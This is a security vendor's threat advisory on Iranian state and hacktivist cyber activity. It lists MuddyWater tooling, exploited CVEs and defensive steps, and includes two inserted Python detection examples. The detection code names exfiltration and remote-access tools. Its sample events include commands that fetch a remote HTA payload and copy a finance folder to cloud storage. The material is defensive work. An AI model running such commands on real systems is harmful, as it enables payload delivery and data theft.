Intel Bulletin: Geopolitical Escalation and Cyber Risk Advisory – March 12, 2026

Status: Active Exploitation Publicly Disclosed 

Current Threat Posture: Heightened 

Expected Activity Window: Days to Weeks 

Known Indicators of Compromise 

  • Dindoor: JavaScript backdoor 
  • FakeSet: Python backdoor 
  • Rclone leveraged for exfiltration 

Known Tooling 

  • Reconnaissance: smbmap, whoami, net.exe 
  • Remote Access/Lateral Movement: SimpleHelp, Tactical RMM, Syncro, Out1, Plink, N-Able, RDP 
  • Execution: WMI, WMIExec, PowerShell, PowerSploit, mshta, msiexec 
  • Command and Control (C2): PhonyC2, MuddyC3, MuddyC2Go 
  • File Transfer/Storage: RClone, UploadBoy, Sync, TeraBox, Backblaze, Oshi, OneHub 

Recommended Defensive Focus 

  • Identity protection is critical: Iranian actors frequently gain access through phishing, password spraying, and credential theft, making MFA enforcement and authentication monitoring essential. 
  • Internet-facing systems are a primary entry point: organizations should prioritize patching edge devices, VPN appliances, and exposed services to reduce exploitation risk. 
  • Social engineering and data theft are common tactics: Iranian campaigns often rely on phishing, SMS/voice impersonation, and credential harvesting, followed by data exfiltration or persistence inside networks. 
  • Organizations should ensure resilience against disruption: validated backups and clear incident response procedures are necessary in the event of destructive or disruptive activity. 

The conflict between Iran, Israel, and the United States continues to quickly escalate from years of proxy warfare and nuclear tensions into an open military campaign. On February 28th, 2026, the United States and Israel launched Operations Epic Fury and Roaring Lion, striking Iran’s missile infrastructure, IRGC leadership, and senior regime officials. Iran responded with retaliatory missile and drone attacks across the broader Middle East and has continued to expand the scope of its response in the days since. The conflict shows no signs of near-term resolution, and Iran’s retaliation will not remain confined to the physical battlefield.  

Blackpoint’s Adversary Pursuit Group (APG) is actively monitoring the landscape, including cybercriminal forums, social media, and known threat actor chats, and ingesting indicators of compromise disclosed in publicly available reporting and commercial feeds tied directly to these escalating tensions. Iranian state-sponsored actors, organized under the Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS), have utilized cyber operations as a core instrument of national power. Iran has consistently used cyber operations to project power globally, targeting critical infrastructure, financial systems, and private industry far beyond the immediate conflict zone.  

For Managed Service Providers (MSPs), the risk is concrete and immediate. Iranian-aligned hacktivist groups, many of which operate outside of Iran and are unaffected by Iranian domestic disruptions, are actively targeting organizations perceived as aligned with the United States or Israel. In addition to hacktivist activity, Iranian state-linked cyber operators and affiliated APT groups (MuddyWater, APT42, APT35, etc.) may conduct or enable retaliatory cyber operations, either directly or by leveraging hacktivist fronts to obscure attribution. MSPs are always an attractive target because a single compromised provider can grant adversaries access to dozens of downstream client environments. Blackpoint’s APG expects an increase in cyberattacks against high-value targets in key verticals with the goal of maximum public disruption. Verticals at high risk of being targeted include public utilities, telecommunications, finance, transport, government, education, research, and manufacturing. While these critical industries are frequently the target of known and publicly reported Iranian-attributed cyber activity, there is an even chance that other industries will be targeted through supply chain attacks, retaliatory actions, or as targets of opportunity.  

The Blackpoint Response Operations Center (BROC) is on high alert and is taking a proactive and structured approach to addressing this threat. Indicators of compromise (IOCs) associated with known Iranian threat actors and affiliated hacktivist groups are being continuously ingested from government advisories, trusted threat intelligence feeds, and open-source reporting. These indicators are operationalized directly into detection tooling to ensure that any matching activity across Blackpoint’s monitored environments generates an immediate alert for triage and response. In parallel, the BROC is conducting active threat hunts focused on the tactics, techniques, and infrastructure patterns most closely associated with this conflict, paying particular attention to pre-positioned access, anomalous authentication behavior, and lateral movement consistent with Iranian tradecraft.  

When the Dust Settles: Projecting Iran’s Next Move 

As the kinetic conflict continues and Iran’s command structure reconstitutes, Blackpoint’s APG assesses that Iranian cyber activity will transition from opportunistic hacktivist noise into the sustained, high-impact campaigns that have historically defined Iran’s approach. The United States and its allies should expect a prolonged threat environment that outlasts the military campaign itself. Iran has demonstrated repeatedly that it does not stand down when missiles stop flying; it retools, reestablishes access, and returns with greater precision.  

Phase One: High Volume, Low Sophistication 

The immediate phase of the conflict has produced a temporary but meaningful disruption to Iran’s centralized cyber operations. The collapse of domestic internet connectivity to near zero, combined with the decapitation of senior IRGC and MOIS leadership, has forced Iran’s cyber apparatus into a distributed and autonomous operating mode. Individual units and cells are likely executing offensive operations using pre-established playbooks without the benefit of centralized coordination. This produces a threat that is less precise in the short term but no less dangerous, as autonomous operators are more likely to operate outside of their typical boundaries.  

As connectivity is restored and the Iranian regime stabilizes under new leadership, Blackpoint’s APG projects a phased escalation of Iranian cyber activity. The beginning of this cyber activity, which is already underway, is likely to be high in volume and low in sophistication, stemming from the hacktivist ecosystem. The primary tools of this phase include: 

  • Distributed denial of service (DDoS)  
  • Website defacements 
  • Disinformation campaigns  

These tools are designed to maintain psychological pressure and create the perception of a capable and coordinated response while the regime rebuilds itself behind the scenes.  

Phase Two: Disrupt, Destroy, Expose 

The next phase will mark the return of Iran’s more capable state-sponsored actors, who will begin executing against pre-positioned campaigns targeting environments across North America, Europe, and the Gulf. This phase is expected to be significantly more destructive in nature, characterized by the utilization of malware designed to disrupt, destroy, or expose. Coordinated hack-and-leak operations will likely run in parallel, deliberately timed to coincide with critical moments in this kinetic conflict.  

Iran’s targeting of industrial control systems (ICS) and operational technology (OT) environments is a well-established and deliberate element of its cyber doctrine. These attacks rarely originate within the OT environment itself. Instead, adversaries gain their initial foothold through traditional intrusion techniques directed at corporate IT networks, including credential theft, phishing, and exploitation of publicly facing systems, before pivoting laterally into the connected operational infrastructure. The compromise of a business network and the sabotage of physical infrastructure are not separate incidents. They are sequential stages of a single calculated operation. For MSPs and their clients, this distinction matters enormously, as an organization does not need to directly manage critical infrastructure to be part of the supply chain an adversary targets to reach it.  

The most consequential phase of Iran’s cyber response will be driven not by opportunity, but by necessity. If the conflict continues to erode Iran’s military standing or push the regime toward collapse, cyber operations become one of the few remaining instruments through which Iran can exert meaningful leverage on the world stage. The motivation at that point shifts entirely away from intelligence collection or financial disruption and toward demonstrating that the cost of continued Western military involvement is too high to sustain. When survival is the only objective remaining, restraint is no longer a strategic consideration, and a regime with its back against the wall will exhaust every available capability it has left on the table.  

MuddyWater Enters the Fray 

Cyber-attacks likely performed by MuddyWater, an affiliate of the Iranian Ministry of Intelligence and Security (MOIS), have been publicly reported targeting U.S. companies. The organizations targeted by these offensive operations include a bank within the U.S., a non-profit, a software company, and an airport. The targeting of these critical verticals highlights the likely intent to cause public disruption.  

According to public reports, these attacks began in early February, a few weeks after the U.S. publicly disclosed the possibility of military strikes in mid-January.   

MuddyWater has been active since at least 2017 and largely targets critical infrastructure and private government contractors in the following industries: local government, defense, energy, healthcare, industrials, academia, MSPs, business services, and telecommunications. The group is considered to be espionage motivated, targeting information that could be of use to the Iranian government. 

The TTPs associated with MuddyWater have remained consistent over the bulk of their observed operations, commonly using RMM tools, edge device exploits, open-source hacking tools, and living-off-the-land binaries (LOLBins) to accomplish their tasks. In general, the use of RMMs by threat actors has increased significantly over the last few years. The above techniques also align with the most common threats that Blackpoint observed in 2025. 
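The tooling named in this bulletin (Rclone, mshta, msiexec, WMIExec, the RMM products and the cloud storage services) can be turned directly into process-creation triage rules. The following is an added example, not Blackpoint's detection logic or anything from the advisory; the event tuples, command lines, paths, thresholds and rule wording are all constructed for illustration.

```python
import ntpath
import re

# Tooling named in the advisory, keyed by the technique it supports.
# Matched against the lowercase basename of the process image.
WATCHLIST = {
    "rclone.exe": "file_transfer", "mshta.exe": "lolbin_execution",
    "msiexec.exe": "lolbin_execution", "whoami.exe": "recon",
    "net.exe": "recon", "smbmap.exe": "recon", "plink.exe": "remote_access",
}
# Cloud storage services the advisory lists as exfiltration destinations,
# as they would appear in an rclone command line ('b2' is rclone's
# backend name for Backblaze).
CLOUD_DEST_RE = re.compile(r"\b(terabox|backblaze|b2|onehub|uploadboy)\b")
# RMM products from the advisory, as substrings of an installer name.
RMM_NAMES = ("simplehelp", "tactical", "syncro", "n-able")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def score_process(parent, image, cmdline):
    """Return (severity, reason) for one process-creation event, or None.
    'high' needs immediate triage; 'medium' is a plain watchlist hit."""
    name = ntpath.basename(image).lower()
    cmd = cmdline.lower()
    category = WATCHLIST.get(name)
    # WMI-based remote execution (WMIExec) shows up as WmiPrvSE.exe
    # parenting a shell or tool on the target host.
    if ntpath.basename(parent).lower() == "wmiprvse.exe":
        return ("high", "wmi_remote_exec: spawned by WmiPrvSE.exe")
    if name == "rclone.exe" and CLOUD_DEST_RE.search(cmd):
        return ("high", "rclone targeting listed cloud storage")
    if category == "lolbin_execution" and URL_RE.search(cmdline):
        return ("high", f"{name} fetching a remote payload")
    if name == "msiexec.exe" and any(r in cmd for r in RMM_NAMES):
        return ("high", "unattended RMM agent install via msiexec")
    if category:
        return ("medium", f"{category} tool on watchlist: {name}")
    return None


# Constructed process-creation events (not from the advisory):
# (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta.exe http://203.0.113.5/update.hta"),
    ("cmd.exe", r"C:\Tools\rclone.exe", "rclone.exe config create exfil b2"),
    ("cmd.exe", r"C:\Tools\rclone.exe",
     r"rclone.exe copy C:\Finance exfil:share --transfers 8"),
    ("services.exe", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Temp\SimpleHelp.msi /qn"),
    ("WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /Q /c whoami"),
    ("explorer.exe", r"C:\Program Files\Git\git.exe", "git pull"),
]
```

Note that the third event only scores "medium": once an rclone remote has been configured, its name no longer reveals the backend, so the `config create` step is the better place to catch the destination.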

The group has been known to exploit high severity vulnerabilities to achieve their goals as well. Some of these vulnerabilities are: 

  • CVE-2017-0199 (CVSS 7.8): An RCE vulnerability impacting Microsoft Office/WordPad. 
  • CVE-2023-27350 (CVSS 8.8): An access control vulnerability impacting PaperCut MF/NG. 
  • CVE-2020-1472 (CVSS 10.0): A privilege escalation vulnerability impacting Netlogon. 

Observed Tradecraft 

Additional Relevant Groups and Historical Analysis of the Impact of Kinetic Operations on the Threat Landscape 

A hacktivist group, Handala Hacking Team, has been reported to target organizations in critical verticals in Israel. The group has been active since 2023, maintains a data leak site, and has claimed to target organizations in the Business Services, Construction & Engineering, Technology, Government, and Transportation industry verticals. More recently, they’ve been observed routing traffic through Starlink. Activity sourced from these ranges has been scanning externally facing applications for vulnerabilities. Publicly exposed and/or vulnerable SSL VPNs are among the most common initial access vectors resulting in on-premises incidents actioned by the SOC. 

During times of increased geopolitical tension or kinetic activity taken by a nation, a marked increase in cyberattacks between affiliated parties follows. This has been observed prior during conflicts in the Middle East as well as during the ongoing conflict between Russia and Ukraine.  

The goals of these attacks are often disruption or espionage. As such, common targets for threat actors motivated by geopolitics (nation-state actors or hacktivists) are those that would cause the most interruption for the target country: critical infrastructure and financial organizations within the country, telecommunications and transportation (for disruption), educational or research institutions (for data theft), and manufacturing (to interrupt supply chains). Government organizations are also targeted with the goal of espionage. 

It should be noted that the purpose of this notice is to keep our client base informed and to suggest proactive security checks. Blackpoint has not observed exploitation consistent with or connected to rising geopolitical tensions within our client base at the time of this writing. 

Blackpoint will continue to monitor and provide updates as needed. As always, Blackpoint monitors and takes aggressive action against suspicious and malicious activity within customer environments, including signs of persistence, lateral movement, and threat actor tradecraft. Blackpoint is also closely monitoring this situation to ensure that our security teams have the most relevant and timely intelligence. 

Fingerprints of the Attack: Known Indicators of Compromise (IOCs) 

Details of attacks are still emerging as they occur and are analyzed. However, two backdoors have been identified in these recent attacks. The first is Dindoor, a previously unknown JavaScript backdoor which utilizes Deno for execution. The second is known as Fakeset, which is written in Python. 

These infections were not seen in the same network, but were signed with the same certificates. This hints at the likelihood that the two samples were written and utilized by the same threat actor.   

Tools Seen So Far: 

  • Data Exfiltration: Rclone 
  • Persistence and Access: Dindoor 
  • Persistence and Access: Fakeset 

This list will likely grow as more information emerges. 

Publicly Reported IOCs 

Dindoor


Fakeset


Defensive Recommendations  

Identity & Access Controls  

  • Enforce multi-factor authentication (MFA) across all infrastructure access points  
  • Monitor for anomalous authentication behavior and password spraying  
  • Audit administrative accounts and apply least privilege principles  
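The second bullet above (monitoring for anomalous authentication and password spraying) is the kind of check that is easy to state and easy to get wrong, because per-account lockout thresholds are exactly what a spray is built to stay under. The following is an added example, not Blackpoint's tooling or anything from the advisory; the log format, sample lines, 10-minute window and 5-account threshold are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not from the advisory).
# Format per line: ISO timestamp, source IP, username, result.
SAMPLE_AUTH_LOG = """\
2026-03-12T08:00:01Z 203.0.113.7 alice FAIL
2026-03-12T08:00:03Z 203.0.113.7 bob FAIL
2026-03-12T08:00:05Z 203.0.113.7 carol FAIL
2026-03-12T08:00:07Z 203.0.113.7 dave FAIL
2026-03-12T08:00:09Z 203.0.113.7 erin FAIL
2026-03-12T08:00:11Z 203.0.113.7 frank SUCCESS
2026-03-12T08:05:00Z 198.51.100.9 alice FAIL
2026-03-12T08:05:20Z 198.51.100.9 alice FAIL
2026-03-12T08:05:40Z 198.51.100.9 alice SUCCESS
2026-03-12T09:30:00Z 192.0.2.44 bob SUCCESS
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (FAIL|SUCCESS)$")


def parse_auth_log(text):
    """Parse log lines into (time, src_ip, user, succeeded) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the expected format
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m.group(2), m.group(3), m.group(4) == "SUCCESS"))
    return events


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Flag source IPs that fail against >= min_users distinct accounts inside
    a sliding window. Sprays are low-and-slow per account, so the signal is
    breadth of accounts per source, not failures per account (the metric
    lockout thresholds use and sprays are built to evade)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, src, user, ok in sorted(events):
        if ok:
            successes[src].append(ts)
        else:
            failures[src].append((ts, user))
    flagged = {}
    for src, fails in failures.items():
        for i, (start, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) >= min_users:
                # A success from the same source after the spray started is
                # the highest-priority signal: a guessed password likely worked.
                hit = any(t >= start for t in successes[src])
                flagged[src] = {"users": sorted(users), "success_after": hit}
                break
    return flagged
```

On the sample data only 203.0.113.7 is flagged, with `success_after` set because a logon from that source succeeded after the spray began; the two failures from 198.51.100.9 against a single account are ordinary user error and stay below the threshold.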

Exposure Management  

  • Ensure all software, especially edge devices and VPN appliances, is fully patched  
  • Review externally exposed services and minimize unnecessary attack surface  
  • Validate remote access configurations  

Detection & Monitoring  

  • Increase caution regarding phishing, SMS-based social engineering, and voice-based impersonation attempts, as Iran-nexus threat actors have relied heavily on social engineering attacks in recent years. 
  • Monitor for large amounts of data egress 
  • Confirm logging coverage across identity systems and remote access services  
  • Maintain heightened alerting for signs of persistence and lateral movement  
  • Block aforementioned hashes in applicable security software 

Platform-Specific Controls  

  • Enable and configure Managed Application Control (MAC) within the Blackpoint portal, specifically regarding file transfer and RMM tools, as Iran-nexus threat actors have been known to abuse these in their campaigns. 
  • Ensure EDR visibility is complete across endpoints and servers  

Device Compliance & Conditional Access  

  • Enforce device compliance policies for all endpoints accessing corporate resources  
  • Require managed, encrypted, and monitored devices for access to sensitive systems  
  • Integrate device health into conditional access policies alongside MFA  

Business Continuity  

  • Validate backup integrity, including offline or immutable copies  
  • Review internal incident response procedures and escalation paths 

References 
https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us

Date published: March 12, 2026
Author: Blackpoint Cyber SOC Team